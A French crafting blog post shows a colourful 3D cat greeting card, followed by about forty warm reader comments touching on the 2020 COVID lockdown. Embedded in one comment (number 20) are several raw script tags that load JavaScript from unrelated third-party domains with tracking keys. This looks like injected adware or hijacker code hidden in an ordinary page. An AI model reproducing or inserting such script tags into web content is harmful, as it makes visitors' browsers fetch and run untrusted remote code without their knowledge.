• Carte Chat Colorée

     

     

    Carte Chat Coloré

    [ Décliné en "Bonjour" à Retrouver dans la Rubrique du même nom à "Divers" ICI ]

     

     

    Bonjour les Amies,

    Nous voici de nouveau dans notre Bulle, je vous avoue que l'extérieur ne me fait plus envie... Les attaques terroristes, le virus.... ça me déprime...

    Mercredi et Jeudi mon fils était là et ça m'a fait le plus grand bien....

    Je rattrape, aujourd'hui, mes visites chez vous...

    Voici une carte qui a été faite pour une amoureuse de chat...

     

     

    Carte Chat Coloré

    [ A Retrouver dans la Rubrique "Séparation"-"Fleurs,Nature,Animaux" ICI ]

     

     

    Voici les détails de la Carte... Le chat, après avoir a été imprimé, je l'ai détouré et placer en 3d...

     

     

     

     

    Carte Chat Colorée

     

     

     

     

    Carte Chat Colorée

     

     

     

     

    Carte Chat Colorée

     

     

     

     

    Carte Chat Colorée

     

     

    Et Voici la carte dans son entier...

     

     

    Carte Chat Colorée

     

     

     

     

    Carte Chat Colorée

     

     

     

     

    On se retrouve Mardi....

     

     

    Carte Chat Colorée

     

    [ A Retrouver dans la Rubrique "Merci Visite"-"Automne" ICI ]

     

     

     

     

    Carte Chat Colorée

     

    [ A Retrouver dans la Rubrique "Jours"-"Vendredi"-"Automne" ICI ]

    [ La dame est à Retrouver dans la Rubrique "Mes Tubes"-"Femmes" ICI ]

     

     


    Tags Tags : , , , , , ,
  • Commentaires

    41
    Vendredi 6 Novembre 2020 à 17:26
    Elle est ravissante ta carte bravo Bisous Pierrette67
    40
    Mercredi 4 Novembre 2020 à 07:28

    Une page toute en douceur pour nous aider à voir la vie en rose, merci Valie, je rattrape également mon petit retard de quelques jours pour passer voir mes amies eklablog. Bonne semaine au mieux, prends soin de toi. Je t'embrasse.

    39
    Mardi 3 Novembre 2020 à 19:42

    Une bien belle carte avec de jolies couleurs

    Pas en avance dans mes réponses, mais tout comme toi pas trop d'envies de quoi que ce soit en ce moment, et encore moins de mettre le nez dehors

    Bonne fin de journée

    Bisous

    38
    Lundi 2 Novembre 2020 à 11:48

    bonjour Valie ta carte est magnifique et j'adore ce petit chat si coloré bonne semaine bisous liliane

    37
    Dimanche 1er Novembre 2020 à 06:46

    Trop belle ! J'adore !

    Bisous bisous !

    36
    Samedi 31 Octobre 2020 à 19:50

    Bonsoir ma douce Valie

    Un petit coucou pour te souhaiter une bonne soirée et un beau dimanche

    Avec toute mon amitié et de gros bisous

    Janine

    35
    Samedi 31 Octobre 2020 à 10:48

    Coucou Valie

    ta carte est pétillante par les couleurs

    superbe, bravo

    Génial ces moments avec ton fils

    Passe un bon week-end

    34
    Jacline-H-49
    Samedi 31 Octobre 2020 à 10:15

    Coucou ma Valie,

    suis contente que tu ais pu passer de bons moments avec ton fils.

    suis contente aussi de voir une si belle carte, ce chat a de si belles couleurs, qu'il égaie la journée en ce début de W. E.. Jolie carte que je vais garder en mémoire pendant plusieurs jours. Merci pour tout ma Valie.

    Bon W E à toi, mes GROS BISOUS te tiendront compagnie,

    Jacline 

     

    33
    Samedi 31 Octobre 2020 à 09:16

    De la couleur au milieu de toute cette tristesse ambiante. Comme ça fait du bien Merci. Bon weekend. Gros bisous

    32
    Samedi 31 Octobre 2020 à 09:00

      voilà  une  bien  belle  carte   qui  aurait  plu à  ma  petite   fille  bravo !!!

       gros  bisous  

     

    L’email a bien été copié
    <textarea id="cliquemailclipboardAreaToText"></textarea>
    31
    Samedi 31 Octobre 2020 à 01:39

    Oh je raffole de cette carte, ce chat multicolore me plait infiniment ! C'est beau, original, tendre, bref, ça me fait du bien de voir ta carte et tu le sais, j'ai bien besoin de tendresse actuellement. Là il est presque 2h et je suis toujours en larmes et pas envie de me coucher. Vivement que je me sois habituée au départ de mes loulous... mais c'est bien difficile.

    Bisous

    30
    Vendredi 30 Octobre 2020 à 19:19

    Trop beau j'adore les couleurs du petit chatounet .

    bisous

    29
    Vendredi 30 Octobre 2020 à 18:48

    Coucou Valie

    Très belle réalisation avec ce chat beau en couleurs, j'aime beaucoup! Et le petit papillon sur le bout du nez, a un effet tendresse merveilleux.

    Je te souhaite un très bon WE et une belle soirée.

    Je t'embrasse

    28
    Vendredi 30 Octobre 2020 à 18:14

    Bravo ma tite Valie, ta carte est Splendide, pleine de pep's, nous en avons bien besoin !!

    Il nous faut garder le moral, je publierai sans doute un peu plus histoire de garder un lien, même virtuel, avec mes abonnées, ça me fera du bien j'en suis certaine.

    Prenez bien soin de vous, Mille Bisous affectueux.

    27
    Vendredi 30 Octobre 2020 à 16:13

    Bonjour Valie et merci de ce joli partage, un bien joli chat "coloré" je souhaite à toutes et tous un excellent week-end, et une joyeuse Halloween, malgré tout.

    Bisous, bonne fin d'après midi

    http://mamyvel-creations.eklablog.com/joyeuse-halloween-a204060682

    26
    Vendredi 30 Octobre 2020 à 15:15

    Coucou ma belle Valie, quelle belle carte , il est trop mignon ce chat et j'adore aussi  le petit papillon perché sur le bout de son nez et les couleurs vives.

    Fais attention à toi, ici on n'est pas confiné encore mais les cas positifs sont alarmants, c'est passé au-dessus des 1,000 cas par jour, bien au-dessus de la 1ère vague. Passe une douce fin de journée et un beau week-end, gros bisous la toute douce.

    25
    Vendredi 30 Octobre 2020 à 15:12

    jolie carte pleine de peps bravo

    bisous

    24
    Vendredi 30 Octobre 2020 à 15:10

    bonjour valie ta carte est ^magnifique super beau le rendu du chat j'adore bon week-end gros bisous

    23
    Vendredi 30 Octobre 2020 à 15:03

    https://i.postimg.cc/BnqnnRJD/ptit-bonjour-cuisini-re-valie.gifWow, j'ai l'impression que c'est pour moi... mais je ne suis pas seule à adooorer les chats.  C'est vraiment superbe!

    https://i.postimg.cc/Dy5KB0KJ/gr-m-re-valie.gifet passe une excellente journée.  Je suis très contente pour toi que ton fils ait été te voir.  Ça fait du bien la famille.

    22
    Vendredi 30 Octobre 2020 à 14:36
    lamanuelle25

    ton chat me fait penser aux tableaux de Andy Warhol et le résultat est superbe! Bises Nadine

    21
    Vendredi 30 Octobre 2020 à 14:29

    Bonjour ma chère Valie

    Moi qui aime aussi beaucoup les chats je trouve ta nouvelle création très belle.

    Ici nous ne sommes pas encore confiné et ça m'inquiète beaucoup .

    Bonne fin de semaine et bon week-end ma chère amie

    Gros bisous

    ton amie Janine

    Une Belle Après-Midi

    20
    mamijojo77100
    Vendredi 30 Octobre 2020 à 14:09

    ce chat vient nous narguer avec ces jolies couleurs pleins de peps!  bravo pour ce travail de colorisation.... ce covid m ennuie comme tout le monde.. mais de rester a la maison ne me gene AUCUNEMENT. LEs courses une fois par semaine A CONDITION que des imbeciles ne fassent pas la razzia.. et du moment que j ai internet, . la bloggo Les copines virtuelles, bien sur qqx unes nous lachent.. mais tant pis..mes mains sont tjs en action et il le faut car avec l arthrose ca rouille dur.. je ne m ennuie pas du tout..ici les pharmaciens n ont pLus de vaccins pour la grippe.notre pharmacienne avait commande 1200 vaccins qui normalement devait partir en UN MOIS et bien tout est parti en une semaine. nous il faut attendre le mois de decembre Pour reussir en avoir deux..Prenez soin de vous et attendons patiemment les jours suivants.. GBISOUS  joelle .

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1604062664735" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    19
    marianne pirotte
    Vendredi 30 Octobre 2020 à 13:04

    Ta carte est adorable, j'aime beaucoup !!

    Prends bien soin de toi ma belle

    Gros bisous

    Marianne

    18
    Vendredi 30 Octobre 2020 à 12:56

    superbe ce chat avec ces belles couleurs ca met un peu de gaieté dans ce monde de fou 

    moi comme toi plus envie de mettre un pied dehors avant hier les gens avaient déjà fait la razia sur tous les rayons complètement dingues moi je te le dis ils n'ont encore rien compris pfff c'est fatigant moralement cette situation 

    moi j'arrive pas à créer c'est fou ca bloque complètement j'aimerais démarrer quelque chose mais y a pas moyen grrrr 

    bisous bon week end 

    17
    Vendredi 30 Octobre 2020 à 12:44

    Très belle ta carte pour ton amie!! Bravo à toi pour ta création..... C'est vrai, c' est déprimant de voir tout cela en ce moment.

    Bisous et doux week-end

    16
    Vendredi 30 Octobre 2020 à 12:00

    Etonnant ce chat ! Il apporte de la couleur dans un monde bien triste..

    Bises

    Thaly

    15
    Vendredi 30 Octobre 2020 à 11:53
    Une bien jolie carte qui plaira à une amoureuse des chats sans aucun doute ! Gros bisous et à bientôt !
    14
    Vendredi 30 Octobre 2020 à 11:46

    Chat crée joliment par ici !! ;)
    Bravo pour cette carte colorée et pep's qui fait du bien à voir ...
    Ces mesures me font bien rigoler, confinement ah bon ? Pourtant je continue de prendre les transports en commun chaque jour pour venir travailler et nous allons même recevoir les clients ... deux poids deux mesures ?! Pfffft !!!
    Bon courage à toi et plein de Gros Bisous

    13
    gaelle
    Vendredi 30 Octobre 2020 à 11:23

    moi aussi l'exterieur fini par me faire peur!

    ta carte est superbe et j'aime beaucoup l'association des couleurs

    biz

    gaelle

    12
    Vendredi 30 Octobre 2020 à 11:13

    Une bien jolie carte qui va faire plaisir !

    Le confinement ne me gène pas car je ne sors pas beaucoup depuis janvier sauf pour ma cure et mes séances de piscine qui malheureusement est fermée depuis ce matin.

    Continue à faire attention et prends soin de toi.

    Passe une bonne journée.
    Bisous.

     

    11
    Vendredi 30 Octobre 2020 à 10:50

    elle est magnifique ta carte valie ! bravo

    bisous

    10
    Jour de mai
    Vendredi 30 Octobre 2020 à 10:49

    Coucou Valie, 

    Moi qui adore les chats, je trouve cette carte superbe, de plus par ses couleurs vives, elle apporte la gaïeté qui nous manque actuellement. 

    C'est original et adorable. Une consolation de recevoir ce genre d'attention et une autre d'avoir pu voir ton fiston pendant deux jours, quel bien cela fait. 

    C'est vrai que les news ont vraiment anxiogènes et apportent la crainte même si l'on veut rester optimiste. 

    La joie que nous avons c'est de pouvoir découvrir très souvent voire quotidiennement les merveilles de ton blog. 

    Je te souhaite un excellent vendredi qui j'ose croire sera suivi d'un bon week end. 

    Gros bisous ♥♥♥♥

    LN

     

    9
    Vendredi 30 Octobre 2020 à 10:41

    Bonjour Valie et vous toutes qui venez ici!

    Superbe ton boulot, Valie, bravo!

    J'adore les chats! Malheureusement en ce moment, je ne peux plus en avoir j'ai sept chiens adoptés et certains n'aiment pas du tout les chats.

    Bon week end tout le monde!

    8
    Jeannine (cristal24)
    Vendredi 30 Octobre 2020 à 10:40

    Très belle carte, j'aime beaucoup.

    C'est vrai que les mauvaises nouvelles actuelles ne nous incitent pas à sortir de chez soi.

    Pour moi, les sorties ne seront que pour aller faire les courses ( peut-être une fois pas semaine ?) ou pour les rendez-vous médicaux.

    C'est sûr que tout ça est déprimant, surtout quand on est seule et qu'on ne voit personne ( et je ne pense pas qu'à moi, car il y a beaucoup de personnes dans mon cas, et j'ai quand même de quoi m'occuper en attendant que ça passe yes !!)

    Bonne fin de semaine. A bientôt. Bises.

    Jeannine

    7
    Vendredi 30 Octobre 2020 à 10:14

    Bonjour Valie Ta carte est superbe , moi aussi j adore les chats ils sont tellement beaux !! 

    Magnifique travail en tout cas bravo 

    moi ce chat le l’ai fait à l époque où je ferais de la peinture diamant 

    Gros bisous et à très bientôt et prend soin de toi 

    6
    Vendredi 30 Octobre 2020 à 10:04

    Trop mimi ton chat et ta carte est très belle aussi!

    Je ne sortais déjà pas alors confinement ou pas sa change rien!

    Bisous et doux weed-end

    5
    Vendredi 30 Octobre 2020 à 09:24

    jolie carte, on a besoin de s'échapper en créant !

    bisous bisous / Nicole

    4
    Vendredi 30 Octobre 2020 à 09:06

    Bonjour ma Valie, une pur merveille cette carte, j'aime beaucoup la couleur de ce chat, il est original mais adorable !!! 

    Heureuse que tu ai pu voir ton fils, ça a du être deux jours merveilleux pour toi

    Je te souhaite un doux vendredi

    Bisous de Pat

     

    3
    Vendredi 30 Octobre 2020 à 09:05
    dane

    Coucou Valie, j' adore ta carte chat c' est un superbe travail de couleurs et ce petit papillon sur le bout de son nez trop mignon, j' adore !!! félicitation ma belle bisous a bientôt

    2
    Elisabeth Marteen
    Vendredi 30 Octobre 2020 à 08:47
    Joliment colorée bravo.
    Bises
    1
    Vendredi 30 Octobre 2020 à 08:46

    Merci ma Valie qui chaque matin nous ravit de tes délicieuses création, je me met en pause ma douce, l extérieur anxyogène mon etat de santé qui devient fort critique, ces etres malafaisants qui peuvent te tuer au détour du chemin sans que rien ne se fasse, ce nouveau confinement et l attente de mon scanner pour mon poumon font que je n ai plus le moral, mon petit coeur saigne de tout ça, la paix pour moi que je chérissais tant n existe plus et n existera plus, mon monde s écroulePrends bien soin de toi ma chérie et de ta merveilleuse famille, je reviens après mon scanner je suis trop dans l attente 

    bisous tendresse 

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :